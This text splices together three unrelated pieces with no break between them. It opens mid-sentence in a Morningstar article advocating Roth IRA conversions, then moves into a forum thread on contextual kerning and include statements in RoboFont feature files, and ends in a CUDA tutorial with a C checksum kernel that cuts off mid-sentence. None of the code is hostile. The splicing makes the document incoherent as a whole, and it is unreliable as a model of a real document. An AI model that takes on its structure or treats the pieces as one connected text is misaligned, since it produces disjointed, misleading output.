historically low rates. That means traditional IRA owners will likely be looking at a higher tax rate applied to both principal and growth when they make withdrawals in the future. In this context, converting assets to a Roth IRA would provide a rare opportunity to pay taxes up front at a discount. Unfortunately, many people will hesitate to take advantage of this option simply because they don’t want to write a check to the IRS today. Here’s where education and guidance from an advisor can prove its worth. The second variable at play today is a volatile stock market that might periodically depress a client’s IRA account value. Converting to a Roth during such a time can turn a downturn into a tax advantage. For example, let’s say your client has an IRA worth $80,000 that drops to $70,000 during a market dip. Converting at this point would trigger tax on only that $70,000 even if the account recovers by the end of the year. In fact, given the current tax and economic circumstances, clients may want to consider maxing out Roth conversions. A simple example: Let’s say Karyn, who has an IRA with a balance of $1.5 million, has plenty of outside cash and taxable investments to cover the tax costs of a conversion, will not be reliant on RMDs when she retires in 10 years at age 65, and lives in Nevada, where there are no state income taxes. She currently pays taxes at the highest federal rate and does not expect that to change when retired. If Karyn were to convert her entire IRA balance of $1.5 million to a Roth IRA, she would incur tax of $555,000, given a 37% tax rate. That’s quite a steep cut, but it could pay off dramatically in the long run. Let’s assume a 37% tax on traditional IRA distributions, a 30% tax on investment income, and a growth rate on the account of 7% per year. In that scenario, if Karyn died at 90, her heirs would receive a little over $9 million if she remained in a traditional IRA taxed at her death. But had she converted the entire account over to a Roth at the age of 55, her heirs would receive a bit more than $13 million. That’s the advantage of long-term compounding uninterrupted by mandatory withdrawals. Moreover, that example assumes no change in tax rates. If rates do indeed increase, the advantage of converting to a Roth would be even more pronounced. Assume a small change in five years from 37% to 40% for ordinary income, and from 30% to 32% on investment income. In this case, the traditional IRA scenario would produce only $8.5 million for Karyn’s heirs, compared with the $13 million result in a Roth. Morningstar Office subscribers can find tables detailing the numbers in this example in a version of this article at. This scenario makes a compelling case for an all-out Roth conversion. Even greater savings might occur should tax rates increase further, and/ or if the conversion takes place during a market low. Advisors should seriously consider Roth conversion for clients—even for those who were not good candidates in the past. Of course, each client is different and more detailed tax considerations need to be taken into account, such as impacts on Social Security taxability, surtaxes, and state income taxes. But given historically low tax rates and high market volatility, this might be the time to convert as much as possible to a Roth. A version of this article originally appeared in Winter 2019 edition of Morningstar Magazine. To learn more about Morningstar magazine, please visit our corporate website.
https://www.morningstar.com/articles/959361/revisiting-roth-conversions
CC-MAIN-2020-24
refinedweb
1,627
59.23
21 May 2009 04:24 [Source: ICIS news] SINGAPORE (ICIS news)--A majority of Asian melamine players have concluded their first quarter (Q1) contracts down by $650-1,000/tonne at $1,200-1,350/tonne (€468-720/tonne) due to poor demand, producers and buyers said on Thursday. They said weak demand due to global economic downturn coupled with falling feedstock costs attributed to the steep decrease in contract prices of around 40% compared to the previous fourth quarter contract prices in 2008. Q4 contract prices were settled at $1,850-2,350/tonne CFR (cost and freight) Asia. Major producers were initially targeting higher Q1 contract prices at $1,500-1,600/tonne CFR ?xml:namespace> However, they had to subsequently adjust their offers down, due to softer feedstock costs. Demand from the downstream wood plying, adhesive and table ware sectors was too weak to support higher prices, traders added. "The global melamine market has remained weak," said a southeast Asian buyer. Traders said that players were taking around 30-35% less contract volumes compared with the same period last year, underscoring a lack of downstream demand. ($1 = €0.74) To discuss issues facing the chemical industry go to ICIS connect For more information on mel
http://www.icis.com/Articles/2009/05/21/9218177/asia-q1-melamine-contract-settles-lower-at-1200-1350t.html
CC-MAIN-2014-52
refinedweb
208
58.92
I have the following simple code: import serial ser = serial.Serial('/dev/ttyUSB0', baudrate = 9600, timeout=.25) ser.open ser.write(chr(0xFF) + chr(0) + chr(3)) ser.close The device is a USB relay board with a FTDI 245RL. On windows, if I change '/dev/ttyUSB0' to 2 for COM3, it works great. I tried it on a Debian machine and a CentOS 5 machine and neither worked. I ran it as root, so I don't think it is permissions. The symptom is that it seems to hang on the write(). I'm using Python 2.6. The values of serial.VERSION are: CentoS5 & Windows :2.6, Debian:1.35. Thanks! Chris Liechti 2013-10-11 Chris Liechti 2013-10-11 ser.open and ser.close only return the function object, you'd need to add "()" to actually call them, but anyway, the port is opened when instantiated. I see nothing wrong here and would expect that it works. Only the timeout value is very small. I usually suggest values in the range of a few seconds. Tested with current SVN head, did not notice any problem, timeout of 0.25 also works. Chris Liechti 2014-08-04 Chris Liechti 2014-08-04 closing old ticket.
http://sourceforge.net/p/pyserial/support-requests/61/
CC-MAIN-2015-22
refinedweb
208
79.36
solid_i18n 0.3.1 Use default language for urls without language prefix (django) solid_i18n contains middleware and url patterns to use default language at root path (without language prefix). Default language is set in settings.LANGUAGE_CODE. Requirements - python (2.6, 2.7) - django (1.4, 1.5, 1.6) Behaviour There are two modes: - settings.SOLID_I18N_USE_REDIRECTS = False (default). In that case i18n will not use redirects at all. If request doesn’t have language prefix, then default language will be used. If request does have prefix, language from that prefix will be used. - settings.SOLID_I18N_USE_REDIRECTS = True. In that case, for root paths (without prefix), django will try to discover user preferred language. If it doesn’t equal to default language, redirect to path with corresponding prefix will occur. If preferred language is the same as default, then that request path will be processed (without redirect). Also see notes below. Quick start Install this package to your python distribution: pip install solid_i18n Set languages in settings.py: # Default language, that will be used for requests without language prefix LANGUAGE_CODE = 'en' # supported languages LANGUAGES = ( ('en', 'English'), ('ru', 'Russian'), ) # enable django translation USE_I18N = True # Optional. If you want to use redirects, set this to True SOLID_I18N_USE_REDIRECTS = False Add SolidLocaleMiddleware instead of LocaleMiddleware to MIDDLEWARE_CLASSES: MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'solid_i18n.middleware.SolidLocaleMiddleware', 'django.middleware.common.CommonMiddleware', ) Use solid_i18n_patterns instead of i18n_patterns from django.conf.urls import patterns, include, url from solid_i18n.urls import solid_i18n_patterns urlpatterns = patterns('' url(r'^sitemap\.xml$', 'sitemap.view', name='sitemap_xml'), ) news_patterns = patterns('' url(r'^$', 'news.views.index', name='index'), url(r'^category/(?P<slug>[\w-]+)/$', 'news.views.category', name='category'), url(r'^(?P<slug>[\w-]+)/$', 'news.views.details', name='detail'), ) urlpatterns += solid_i18n_patterns('', url(r'^about/$', 'about.view', name='about'), url(r'^news/', include(news_patterns, namespace='news')), ) Start the development server and visit to see English content. Visit to see Russian content. If SOLID_I18N_USE_REDIRECTS was set to True and if your preferred language is equal to Russian, request to path will be redirected to. But if preferred language is English, will be shown. Example site Located here, it is ready to use, just install solid_i18n (this package): pip install solid_i18n clone example site: git clone step in example/ and run development server: cd django-solid-i18n-urls/example python manage.py runserver Notes - When using SOLID_I18N_USE_REDIRECTS = True, there is some nasty case. Suppose django has determined user preferred language incorrectly (maybe in user’s browser preferred language is not equal to his realy preferred language, because for example it is not his computer) and it is Russian. Then on access to url without prefix, i.e. '/', he will be redirected to '/ru/' (according to browsers preferred language). He wants to look english content (that is default language), but he can’t, because he is always being redirected to '/ru/' from '/'. To avoid this, it is needed to set preferred language in his cookies (just <a href="{{ specific language url}}"> will not work). For that purporse django’s set_language redirect view shall be used. See example in this package. - Of course, you must specify translation for all languages you’ve marked as supported. For details look here:. - Author: st4lk - Keywords: django,i18n,urls,solid,redirects,language,default - License: BSD License - Platform: Any - Categories - Package Index Owner: st4lk - DOAP record: solid_i18n-0.3.1.xml
https://pypi.python.org/pypi/solid_i18n/0.3.1
CC-MAIN-2018-13
refinedweb
554
50.63
Hello, I'm working on a File manager-like structure with NGUI, so far so good. The way I got my "Folder" set up, is that a folder consists of "Parts" which consists of a Background, Icon and a Label, "Contents" which carry the folder's content, a "FolderContent" could either be a "Folder" or "FILE". Whenever I "Open" a folder, (in short) I hide the previous folder contents and show the new ones'. The problem is, when I pickup a folder and move it with the mouse (drag and drop or just pick and hold) I auto-organize the current folder's contents (reposition them), when a folder gets repositioned (n shifts to the left/up), its contents also shift with it, so when I open the folder later, I will see that the contents' are not positioned correctly. I can get around that by using one of my methods "OrganizeContents" which does exactly what you think, but that wouldn't be necessary to do each time I open a folder, it's redundant. Have a look: Any ideas how to move a gameObject without affecting its children? Another work-around would be to move the Folder's "Parts" when auto-positioning it, but that would bring inconsistencies in other places. If I can't do what I'm asking for, any other work-arounds beside the two I mentioned? Thanks. Actually, each folder has a List of "FolderContent"s, if that's what you mean. It just makes sense to put the contents of a folder, inside the folder, doesn't it? - It has nothing to do with NGUI, just common sense. Of course that folder has some content, but this does not mean you have to create it using Unity objects hierarchy. If you gain nothing from it, and additionally it causes problems, then why even bother? In my approach, you still have proper hierarchy. I'll try to describe it in more detailed way. Let's assume every folder/file is represented by a Plane object for which you have created a prefab. You also have to create a FileSystemObject script and attach it to this prefab. Basically, FileSystemObject should look like (C#): public class FileSystemObject { public FileSystemObject[] children; public FileSystemObject[] parent; public ObjectType type; // this can be an enum {File, Directory} } When browsing your data you can dynamically create a number of Plane instances, get their FileSystemObject components and sets their properties. And you have the hierarchy you wished for, but don't have the problems related to position. Instead of dynamic creation of Planes, it would be much better to reuse some instances created at the start of your application. As to navigation: when you click on my Plane (or in your case object visually representing the folder), you can retrieve its script and properly instantiate children: var fso = GetComponent(); foreach(var child in fso.children) { // instantiate children } I think it should be quite easy to convert your current solution to this approach. why the array of parents? a folder content has only one parent. storing a ref to the parent was my previous setup, but then I figured I don't need it. Is there a reason for the parents array? OK thanks I got your point, basically keep everything the same, but don't mess with the game objects' hierarchy, no parenting. gonna have to go now, I'll do it. could you move your comments to an answer? I will accept it once everything's ok. Answer by ArkaneX · Sep 01, 2013 at 04:15 PM What is the reason behind storing subfolders and files as children of the folder? I know nothing about NGUI, but if I were to code it in pure Unity, I would probably store subfolders and files as an arrays of GameObjects[] in parent folder script, not as standard GameObject children. If required, I would add another property for keeping reference to parent (null for top level folder): public GameObject[] folders; public GameObject[] files; public GameObject parentFolder; This way, repositioning parent would not affect children position. You can of course change GameObject in above snippet with proper objects. EDIT: converted to answer after exchanging a few comments with OP (under question). That did it just nice! A lot of code has been nuked on the way :) Easy conversion as well like you said. However I think it's more elegant to use OOP here and not simply an enum to represent a FileSystemObject. There's a lot of benefits to that, for example, a folder doesn't need to have an array of files and folders, just an array (preferably a list) of FileSystemObjects, which could be either a File or a Folder. Again, no need for the parentFolder, in case you're putting it so that each folder knows its parent when you "GoBack", you could just use a stack, each time you open a folder you just push, when you go back you pop, the parent would be left out as extra luggage in the folder class. Thanks a lot for your help :) You're right regarding OOP - my solution was just a quick 'how to' example. Glad it was helpful :) Answer by DESTRUKTORR · Sep 01, 2013 at 04:17 PM The best method for moving the parent object without moving the child objects would be to save the child object's absolute position (transform.position) prior to moving the parent, then, after calling the move on the parent, set the child's absolute position back to what it was before the move. This does sound quite like repositioning them once again, but performance-wise, it's better. 2 n loops, an assignment in each loop, saves some math/calculations. I'll benchmark it with the auto organizing method, if there's a huge dif, I'll choose your solution :) I'm afraid it's not gonna work in my situation. Thinking about it, it is a good solution but not for me because what would happen if there ware more folders to the right/under 'Vids'? (in the previous example), using your method, I would have to save the contents positions of all those folders and then re-assign them again... :/ Why do it in the loop? The user will only notice that their position is changed after the next frame is loaded. Just ensure that it's moved back to its original position after everything else has moved XD. One way or another, it's only a reassignment of a Vector3 variable, which is little more than 3 floats (12 bytes, which, in the grand scheme of things, is really not much, considering we are beginning to see megabytes, or millions of bytes, as being laughably small amounts of data), and it's an O(n) efficiency, as the only level of variation is the first layer of children. However, like ArkaneX said, it might just be easier if you simply didn't have the objects parented to one another, lol. The primary purpose, by and large, of making a game object a child of another is to ensure that they move, together, and sometimes to allow scripts to more easily access components of their children/parents (or, on occasion, to organize the hierarchy a bit better, but that's really not all that usual, nor should it take precedence over efficiency, IMO). Thanks for clearing out when to make objects childs of other objects. I obviously mis-used parenting. [CODE]Keep Gameobject position exactly at mouse cursor when cast float position to int 1 Answer Simultaneously moving GameObjects using C# script. 3 Answers transform.position error 1 Answer How Should I Get a List of Child Objects 2 Answers Instantiate as a child at position 2 Answers
https://answers.unity.com/questions/528336/how-to-move-a-gameobject-without-affecting-its-chi.html
CC-MAIN-2019-43
refinedweb
1,296
58.62
To improve my understanding of GADT, I tried to define a Set datatype, with the usual operations, so that it can be made a member of the standard Monad class. Here I report on my experiments. First, I recap the problem. Data.Set.Set can not be made a Monad because of the Ord constraint on its parameter, while e.g. (return :: a -> m a) allows any type inside the monad m. This problem can be solved using an alternative monad class (restricted monad) so that the Ord context is actually provided for the monad operations. Rather, I aimed for the standard Monad typeclass. To avoid reinventing Data.Set.Set, my datatype is based on that. Basically, when we know of an Ord context, we use a Set. Otherwise, we use a simple list representation. Using a list is just enough to allow the implementation of return (i.e. (:[])) and (>>=) (i.e. map and (++)), so while not being very efficient, it is simple. Other non-monadic operators require an Ord context, so that we can turn lists into Set. My first shot at this was: data SetM a where L :: [a] -> SetM a SM :: Ord a => Set.Set a -> SetM a However, this was not enough to convince the type checker to use the Ord context stored in SM. Specifically, performing union with union (SM m1) (SM m2) = SM (m1 `Set.union` m2) causes GHC to report "No instance for (Ord a)". After some experiments, I found the following, using a type equality witness: data Teq a b where Teq :: Teq a a data SetM a where L :: [a] -> SetM a SM :: Ord w => Teq a w -> Set.Set w -> SetM a Now if I use union (SM p1 m1) (SM p2 m2) = case (p1,p2) of (Teq,Teq) -> SM Teq (m1 `Set.union` m2) it typechecks! This rises some questions I cannot answer:... Below, I attach the working version. Monad and MonadPlus instances are provided for SetM. Conversions from/to Set are also provided, requiring an Ord context. "Efficient" return and mzero are included, forcing the Set representation to be used, and requiring Ord (these could also be derived from fromSet/toSet, however). Comments are very welcome, of course, as well as non-GADT related alternative approaches. Regards, Roberto Zunino. ============================================================ \begin{code} {-# OPTIONS_GHC -Wall -fglasgow-exts #-} module SetMonad ( SetM() , toSet, fromSet , union, unions , return', mzero' ) where import qualified Data.Set as S import Data.List hiding (union) import Control.Monad -- Type equality witness data Teq a b where Teq :: Teq a a -- Either a list or a real Set data SetM a where L :: [a] -> SetM a SM :: Ord w => Teq a w -> S.Set w -> SetM a instance Monad SetM where return = L . (:[]) m >>= f = case m of L l -> unions (map f l) SM Teq s -> unions (map f (S.toList s)) instance MonadPlus SetM where mzero = L [] mplus = union -- Efficient variants for Ord types return' :: Ord a => a -> SetM a return' = SM Teq . S.singleton mzero' :: Ord a => SetM a mzero' = SM Teq S.empty -- Set union: use the best representation union :: SetM a -> SetM a -> SetM a union (L l1) (L l2) = L (l1 ++ l2) union (SM p1 m1) (SM p2 m2) = case (p1,p2) of (Teq,Teq) -> SM Teq (m1 `S.union` m2) union (L l1) (SM p m2) = case p of Teq -> SM Teq (m2 `S.union` S.fromList l1) union s1 s2 = union s2 s1 -- Try to put a SM first before folding, to improve performance unions :: [SetM a] -> SetM a unions = let isSM (SM _ _) = True isSM _ = False in foldl' union (L []) . uncurry (++) . break isSM -- Conversion from/to Set requires Ord toSet :: Ord a => SetM a -> S.Set a toSet (L l) = S.fromList l toSet (SM p m) = case p of Teq -> m fromSet :: Ord a => S.Set a -> SetM a fromSet = SM Teq -- Tests test :: IO () test = do let l = [1..3] :: [Int] s = fromSet (S.fromList l) g x = return' x `mplus` return' (x+100) print $ S.toList $ toSet $ do x <- s y <- s return' (x+y) -- [2,3,4,5,6] print $ S.toList $ toSet $ do x <- s g x -- [1,2,3,101,102,103] print $ S.toList $ toSet $ do x <- s y <- g x return' y -- [1,2,3,101,102,103] print $ S.toList $ toSet $ do x <- s y <- g x g y -- [1,2,3,101,102,103,201,202,203] print $ S.toList $ toSet $ do x <- s y <- return (const x) -- no Ord! return' (y ()) -- [1,2,3] \end{code}
http://article.gmane.org/gmane.comp.lang.haskell.cafe/18118
crawl-002
refinedweb
760
74.69
Opened 5 years ago Closed 21 months ago Last modified 21 months ago #13724 closed Bug (fixed) Calling QuerySet.delete() through a relation the DB router is ignored. Description I'm using django-multidb-router from here: With two database definitions, a read_only_user and a read_write_user (with the intentions of having multiple read-only definitions). When calling QuerySet.delete() through a relation query is sent to the read_only user. Upon inspection it appears MasterSlaveRouter.allow_relation() isn't even called. Example: from django.db import models class ModelA(models.Model): value = models.IntegerField(default=0) class ModelB(models.Model): value = models.IntegerField(default=0) a = models.ManyToManyField(ModelA) >>> a = ModelA() >>> a.save() >>> b = ModelB() >>> b.a.add(a) >>> b.a.all() [<ModelA: ModelA object>] >>> b.a.all().delete() Traceback (most recent call last): File "<console>", line 1, in ? File "/home/ctargett/d/proj/code/django/db/models/query.py", line 445, in delete delete_objects(seen_objs, del_query.db) File "/home/ctargett/d/proj/code/django/db/models/query.py", line 1335, in delete_objects del_query.delete_batch(pk_list, using=using) File "/home/ctargett/d/proj/code/django/db/models/sql/subqueries.py", line 41, in delete_batch self.do_query(self.model._meta.db_table, where, using=using) File "/home/ctargett/d/proj/code/django/db/models/sql/subqueries.py", line 27, in do_query self.get_compiler(using).execute_sql(None) File "/home/ctargett/d/proj/code/django/db/models/sql/compiler.py", line 727, in execute_sql cursor.execute(sql, params) File "/home/ctargett/d/proj/code/django/db/backends/util.py", line 15, in execute return self.cursor.execute(sql, params) File "/home/ctargett/d/proj/code/django/db/backends/mysql/base.py", line 86, in execute return self.cursor.execute(query, args) File "/usr/lib64/python2.4/site-packages/MySQLdb/cursors.py", line 166, in execute self.errorhandler(self, exc, value) File "/usr/lib64/python2.4/site-packages/MySQLdb/connections.py", line 35, in defaulterrorhandler raise errorclass, errorvalue OperationalError: (1142, "DELETE command denied to user 'read_user'@'localhost' for table 'testapp_modelb_a'") Attachments (2) Change History (15) comment:1 Changed 5 years ago by mariarchi - Needs documentation unset - Needs tests unset - Patch needs improvement unset - Resolution set to invalid - Status changed from new to closed comment:2 Changed 2 years ago by paulcollins - Cc paul.collins.iii@… added - Easy pickings unset - Resolution invalid deleted - Severity set to Normal - Status changed from closed to new - Type set to Bug - UI/UX unset - Version changed from 1.2 to 1.3 So we're not using the django-multidb-router, and we're seeing this kind of odd behavior as well. Allow_relation is not being called, which makes sense but what doesn't make sense is .all().delete() The Router is being called for the .all() (db_for_read), but then the QuerySet is being changed to a DELETE. Since db_for_write is never called, and our router automatically picks a read-only slave for read-only queries, thus the expected explosion happens. comment:3 Changed 23 months ago by timo @paulcollins, could you provide a test for Django's test suite that demonstrates the problem? Changed 22 months ago by barnardo comment:4 Changed 22 months ago by barnardo Attached is a test case for 1.3.7. I was not able to duplicate. Please verify. Changed 22 months ago by paulcollins Test case showing the problem comment:5 Changed 22 months ago by paulcollins - Has patch set - Owner changed from nobody to paulcollins - Status changed from new to assigned - Triage Stage changed from Unreviewed to Accepted PR created with unit tests showing several cases where this bug manifests Marking ticket as accepted per conversations with Jacob Kaplan-Moss and Russell Keith-Magee comment:6 Changed 22 months ago by paulcollins - Triage Stage changed from Accepted to Ready for checkin yes badform I know but the code is in a good state per reviews with Russell in person. The docs I think are okay but a second set of eyes is always appreciated. Flagging this as ready for checkin just to get a core devs attention =) comment:7 Changed 22 months ago by russellm To back up @paulcollins here -- I'm completely OK with this being bumped to RFC. There's still a need for a final review, but I've been reviewing the patch as it was being developed, and I'm happy with the direction it's been heading. comment:8 Changed 21 months ago by akaariai - Patch needs improvement set - Triage Stage changed from Ready for checkin to Accepted I added a question to the PR about how db_for_write should work in related manager methods. For example in someobj.related_set.add() (fields/related.py:L418 in current master), should there be one call to db_for_write, and then all objects are saved to that DB? This is how m2m field's add works for example. And, if so, should this be tested. As is, each time save() is called it will individually call db_for_write() and this could lead splitting the save into different databases. Maybe the related manager write routing doesn't need to be addressed in this ticket, and maybe I just don't understand this issue fully (I don't know multidb routing that well). Still, I will mark "patch needs improvement" until this question is answered. comment:9 Changed 21 months ago by paulcollins @akaariai That's a good point, the save could end up splitting it across multiple databases. Depending on how complex the router is maybe that's desired? In any this case, the point of this ticket was the related manager write routing. For example A.objects.get(pk=something).related_set.filter(name__in=[str(range(12))]).delete() A ... get is fine. related_set.filter says get db_for_read .delete should call db_for_write, but since a db has already been set on the QuerySet object it doesn't. At that point it's locked into trying to send the delete to the read database. In the case of sharding db_for_read and db_for_write are probably the same thing, but in the case of master / slave (which is where I ran into this issue) they're not. In a master slave setup, trying to do a delete on db_for_read will (one hopes) fail. In the case of things being split up because of multiple calls to get db_for_write I believe the hint object is passed down the chain so the implementer of the router could make a decision based on that hint. I'll add a check in the tests for the hint and report back. comment:10 Changed 21 months ago by Russell Keith-Magee <russell@…> - Resolution set to fixed - Status changed from assigned to closed comment:11 Changed 21 months ago by russellm @akaariai - FYI - I implemented your suggested change in the test suite; the router tests now validate that the hints and model passed to the router are valid. I'm pretty sure it belongs to django-multidb-router ticket tracker. Please reopen if I'm wrong.
https://code.djangoproject.com/ticket/13724
CC-MAIN-2015-27
refinedweb
1,160
57.77
Roman Yakovenko wrote: >Hi. I use Pyste from CVS. I use VC++ 6.0, SP5 > >The following code produce error on my machine. >( Pyste generates code like this on generating wrappers (in my case). ) > >I don't know whether it ligal error from compiler or not. >I think Dave Abrahams will give the answer in a second. >If this legal error then we need to fix pyste. >Also I think I can try to fix this. > > >namespace ns >{ > >class A >{ >public: > virtual int s(){ return 1; } > >}; > >} > >class B : public ns::A >{ >public: > virtual int s() > { return ns::A::s(); } //<-- error must be A::s >}; > > Works fine for me with Intel C++ 6. I think it is a bug with VC 6, because the code seems legal. I'm sure Dave can supply more info. Regards, Nicodemus.
https://mail.python.org/pipermail/cplusplus-sig/2003-August/005016.html
CC-MAIN-2014-15
refinedweb
136
85.89
I found myself asking and answering my own question on StackExchange today (by the way, don't be afraid to do that if you find a good answer, and also be ready for a better answer to possible pop up!): My typical build-out for Glass and fluent config is to use an interface and map file (using SitecoreGlassMap) for modeling, but I know if I need to use the model to add data to Sitecore I can't use the interface type. From a best practice standpoint, if my model is… As an opening summary, my typical setup for using Glass with Sitecore is to use fluent configuration. So if I have a model like this: public interface ITemplate { string Field { get; set; } } Then I would create this mapping entry to link up the POCO to Sitecore: public class TemplateMap : SitecoreGlassMap<ITemplate> { public override void Configure() => Map(config => { config.Field(f => f.Field).FieldName("Field"); }); } And then you can retrieve the item with code similar to this (note that SitecoreService needs to be replaced with an appropriately arranged call that establishes the service): ITemplate item = SitecoreService.GetItem<ITemplate>(new GetItemByIdOptions(Guid.Parse("{}"))); So that's all good. But when you need to add content to Sitecore for any reason, you can't use the interface and instead need a standard class: public class Template : ITemplate { public string Field { get; set; } } Now if you've done the Glass training, you'll see in the section on creating items that they use the attribute mapping. That's easy enough, but how does it work with the fluent configuration? Right now, the map goes to the interface only. So do we have to use attribute mapping, or make a separate map? Turns out it's pretty easy. All you have to do is change the map to use the concrete class: public class TemplateMap : SitecoreGlassMap<Template> { public override void Configure() => Map(config => { config.Field(f => f.Field).FieldName("Field"); }); } Now if you use the GetItem call from earlier, it still works. And then if you need to create a new item as a subitem to that, this code will work: ITemplate newItem = new Template { Name = "Test Item" }; using (new SecurityDisabler()) { ITemplate createOrg = SitecoreService.CreateItem<ITemplate>(new CreateByModelOptions { Model = newItem, Parent = item }); } So just one extra class and changing the class used in the mapping call, and you're good to go! I'd personally advise only bringing in concrete classes when you have to do these operations, since the interface will work perfectly fine if you're just doing read operations. Discussion (0)
https://practicaldev-herokuapp-com.global.ssl.fastly.net/kmac23va/using-glass-mapper-to-create-new-content-in-sitecore-with-fluent-configuration-of9
CC-MAIN-2022-05
refinedweb
431
54.76
I have some slides/templates with two embedded Excel Tables side-by-side. I use Aspose.Cells Designer template to inject data into these tables. For some users the application return slides with these tables position correctly in the slide. However some users find the tables are not align correctly on page. They overlap other text on the page. Perhaps it depends on the screen’s resolution or some other settings. Is there a way I can lock the position or automatically align the OLE (Excel objects) so all the users see the Excel tables in proper position? I thought I saw some comments about a new feature that allow locking up the position of an object/shape but I could be wrong on this. Thanks. I have some slides/templates with two embedded Excel Tables side-by-side. It seems your problem is related to the sizing of OLE object that are generated by Aspose.Cells. <?xml:namespace prefix = o Aspose.Cells has a method namely SetOletSize(), I have used it to size it properly in the code , you can find in this thread. Please get it from the attachment.
https://forum.aspose.com/t/position-alignment-for-excel-tables-in-slides/100219
CC-MAIN-2022-33
refinedweb
191
66.94
contextual kerning in RB, MM? @gferreira thanks! I see that all the features are strings. It would be nice to have some sort of parser that creates classes or a dictionary out of it so I can just say features['kern'].append('blablabla') As a first prototype this works well. It's a bit clumsy though. The SpaceCenter preview doesn't preview it, but it exports correctly and FeaturePreview extension shows it correctly as well. import metricsMachine font = metricsMachine.CurrentFont() kernFea = font.kerning.compileFeatureText() closer = '} kern;' additions = [ "pos V space' V -125" ] additions = [' '*4+i+';' for i in additions] additions = '\n'.join(additions) kernFea = kernFea.replace(closer, f'{additions}\n{closer}') font.features.text = kernFea That is possible with fontTools feaLib. See That was pretty hard to do.. sometimes I am so blind to easier solutions. This works very well! kern.feagenerated by AFDKO and contextualKern.feadone by hand feature kern { include (kern.fea); include (contextualKern.fea); } kern; @jansindl3r that is a nice clean solution, thanks for sharing! no problem, thanks for help on the way! I came across an issue that RoboFont doesn't want to accept include command when test installing. I test install nearly every hour, so this was pretty important for me. I didn't find anything out there that would flatten the files into one, so here is a small recursion oh that is not good... a test install should be the same as generating a binary tested with a simple dummy font and it works fine... could you send me such a UFO with fea code? thanks! Okay I tested it outside of my font. in one case it worked in the other it did not. when using fontMake from cmd it exported correctly what couldn't be testInstalled from RoboFont. I am sending you the file # did not work: feature ss01 { include(../otherFea.fea); } ss01; #otherFea: sub A by B; # worked: include(../otherFea.fea); #otherFea: feature ss01 { sub A by B; } ss01; euhm still this should work :) according the ufo spec: Any include() statements must be relative to the UFO path, not to the features.fea file itself. see your includes implies the fea file is one level up from the ufo. @frederik I dream of the day someone would convert fontTools feature ast objects to json and we won't use fea file anymore.
https://forum.robofont.com/topic/869/contextual-kerning-in-rb-mm/12
CC-MAIN-2020-40
refinedweb
392
69.18
) ) At work we do plenty of video and image manipulation, particularly video encoding. While it's certainly not a specialty of mine I've had plenty of exposure to enterprise-level transcoding for projects like transcode.it, our free public transcoding system; uEncode, a RESTful encoding service; and our own in-house solutions (we're DVD Empire, BTW). Of course my exposure is rather high-level and large portions of the process still elude me but I've certainly developed an appreciation for boxes with multiple GPUs chugging away performing complex computation. For a while now I've been hoping to dedicate some time to peer into the inner workings of GPUs and explore the possibility of using them for general-purpose, highly-parallel computing. Well, I finally got around to it. Most of the machines I use on a regular basis have some kind of NVIDIA card so I decided to see what resources they had to offer for general-purpose work. Turns out they set you up quite well! They offer an architecture called CUDA which does a great job of rather directly exposing the compute resources of GPUs to developers. It supports Windows, Linux and Macs equally well as far as I can tell and while it has bindings for many higher-levels languages it's primarily accessible via a set of C extensions. Like I said, I'm relatively new to this so I'm in no position to profess, but figured I might as well share one of the first experiments I did while familiarizing myself with CUDA. Also, I'd like some feedback as I'm just getting my feet wet as well. Getting Started & Documentation Before going any further check out the "Getting Started Guide" for your platform on the CUDA download page. It will indicate what you specifically have to download and how to install it. I've only done so on Macs but the process was simple, I assure you. Example Ok, here's a little example C program that performs two parallel executions (the advantage of using GPUs is parallelism after all) of the "Internet Checksum" algorithm on some hard-coded sample data. First I'll blast you with the full source then I'll walk through it piece by piece. #include <stdio.h> #include <cuda_runtime.h> /* ; } int main (int argc, char **argv) { int device_count; int size = 8; int count = 2; unsigned short checksums[count]; int i;}; /* ask cuda how many devices it can find */ cudaGetDeviceCount(&device_count); if(device_count < 1) { /* if it couldn't find any fail out */ fprintf(stderr, "Unable to find CUDA device\n"); } else { /* for the sake of this example just use the first one */ cudaSetDevice(0); unsigned short *gpu_checksum; /* create a place for the results be stored in the GPU's memory space. */ cudaMalloc((void **)&gpu_checksum, count * sizeof(short)); unsigned char *gpu_buff; size_t gpu_buff_pitch; /* create a 2d pointer in the GPUs memory space */ cudaMallocPitch((void**)&gpu_buff, &gpu_buff_pitch, size * sizeof(unsigned char), count); /*); /* execute the checksum operation. two threads of execution will be executed due to the count param. */ inet_checksum<<<1, count>>>(gpu_buff, gpu_buff_pitch, size, gpu_checksum); /* copy the results from the GPU's memory to the host's */ cudaMemcpy(&checksums, gpu_checksum, count * sizeof(short), cudaMemcpyDeviceToHost); /* clean up the GPU's memory space */ cudaFree(gpu_buff); cudaFree(gpu_checksum); for(i = 0; i < count; i++) printf("Checksum #%d 0x%x\n", i + 1, checksums[i]); } return 0; } Dissection Phew, alright. There wasn't really all that much to it, but I'm sure many of you will appreciate some explanation. I'm sure you know the first directive. The second is obviously the inclusion of CUDA. #include <stdio.h> #include <cuda_runtime.h> The following is what's referred to as a "kernel" in CUDA. It's basically a function that can execute on a GPU. Note the function is __global__ and has no return type. The details of the function really aren't the subject of the article. In this case it calculates the "internet checksum" of the incoming buff but here's where you'd put your highly-parallelizable, computationally intensive code. The pitch will make more sense later as it helps to deal with memory alignment of multi-dimensional data which is what the buff turns out to be despite being a one dimensional vector. One dimension per thread, each with eight bytes. Also have a look at the threadIdx.x. That's how you can determine which thread you are and can use it to read/write from the correct indexes in vectors, etc. /* ; } Getting the party started. Note that this indicates that we have two elements of eight bytes a piece with the size and count variables. They'll carve up our hard-coded data. int main (int argc, char **argv) { int device_count; int size = 8; int count = 2; unsigned short checksums[count]; int i; Now here's the data we're going to checksum. We'll actually be treating this as two distinct values later. The first eight bytes will be checksummed while the second eight bytes are checksummed on another GPU thread.}; The comment says it all. We're just asking CUDA how many devices it can find. We could then use that information later to distribute load to GPUs. /* ask cuda how many devices it can find */ cudaGetDeviceCount(&device_count); For the most part we'll ignore it however. We will make sure at least one was found as there's not point to all this if we can't slap our load on a GPU! Assuming a GPU was found we'll call cudaSetDevice to direct CUDA to run our GPU routines there. if(device_count < 1) { /* if it couldn't find any fail out */ fprintf(stderr, "Unable to find CUDA device\n"); } else { /* for the sake of this example just use the first one */ cudaSetDevice(0); Now I'll create a vector for the checksum's to be written in to by our "kernel". Think of the cudaMalloc as a typical malloc call except the memory is reserved in the GPU's space. We wont' directly access that memory. Instead we'll copy in and out of it. The use of count indicats that it'll have room for two unsigned short values. unsigned short *gpu_checksum; /* create a place for the results be stored in the 